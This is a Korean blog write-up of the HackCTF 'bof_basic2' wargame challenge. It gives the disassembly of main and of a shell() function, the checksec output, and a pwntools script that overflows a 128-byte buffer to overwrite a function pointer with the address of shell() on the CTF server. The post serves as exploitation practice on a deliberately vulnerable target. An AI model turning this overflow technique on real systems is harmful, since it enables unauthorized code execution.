반응형
문제 소스
메인함수
Dump of assembler code for function main:
0x080484cd <+0>: lea ecx,[esp+0x4]
0x080484d1 <+4>: and esp,0xfffffff0
0x080484d4 <+7>: push DWORD PTR [ecx-0x4]
0x080484d7 <+10>: push ebp
0x080484d8 <+11>: mov ebp,esp
0x080484da <+13>: push ecx
0x080484db <+14>: sub esp,0x94
0x080484e1 <+20>: mov DWORD PTR [ebp-0xc],0x80484b4
0x080484e8 <+27>: mov eax,ds:0x804a040
0x080484ed <+32>: sub esp,0x4
0x080484f0 <+35>: push eax
0x080484f1 <+36>: push 0x85
0x080484f6 <+41>: lea eax,[ebp-0x8c]
0x080484fc <+47>: push eax
0x080484fd <+48>: call 0x8048350 <fgets@plt>
0x08048502 <+53>: add esp,0x10
0x08048505 <+56>: mov eax,DWORD PTR [ebp-0xc]
0x08048508 <+59>: call eax
0x0804850a <+61>: mov eax,0x0
0x0804850f <+66>: mov ecx,DWORD PTR [ebp-0x4]
0x08048512 <+69>: leave
0x08048513 <+70>: lea esp,[ecx-0x4]
0x08048516 <+73>: ret
End of assembler dump.
shell
Dump of assembler code for function shell:
0x0804849b <+0>: push ebp
0x0804849c <+1>: mov ebp,esp
0x0804849e <+3>: sub esp,0x8
0x080484a1 <+6>: sub esp,0xc
0x080484a4 <+9>: push 0x80485a0
0x080484a9 <+14>: call 0x8048370 <system@plt>
0x080484ae <+19>: add esp,0x10
0x080484b1 <+22>: nop
0x080484b2 <+23>: leave
0x080484b3 <+24>: ret
End of assembler dump.
보호기법
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
문제 분석 및 페이로드
gdb peda로 ret까지 거리 알아냈다.
peda pattern create사용법은 아래 영상 참고
from pwn import *
context.log_level='debug'
dns,port="ctf.j0n9hyun.xyz" ,3001
p=remote(dns,port)
#p=process("./bof_basic2")
e=ELF("./bof_basic2")
shell=e.symbols['shell']
p.send("A"*128+p32(shell))
참고문헌 및 힘들었던 부분
반응형
'War Games > hack-ctf' 카테고리의 다른 글
| [hackctf] x64 Buffer Overflow (0) | 2021.04.18 |
|---|---|
| [hackctf] 내 버퍼가 흘러넘친다 (0) | 2021.04.18 |
| [hackctf] basic_fsb (0) | 2021.04.18 |
| [hackctf] bof_basic #1 (0) | 2021.04.18 |
| [hact ctf] 풍수지리설 분석 자료 (0) | 2021.04.16 |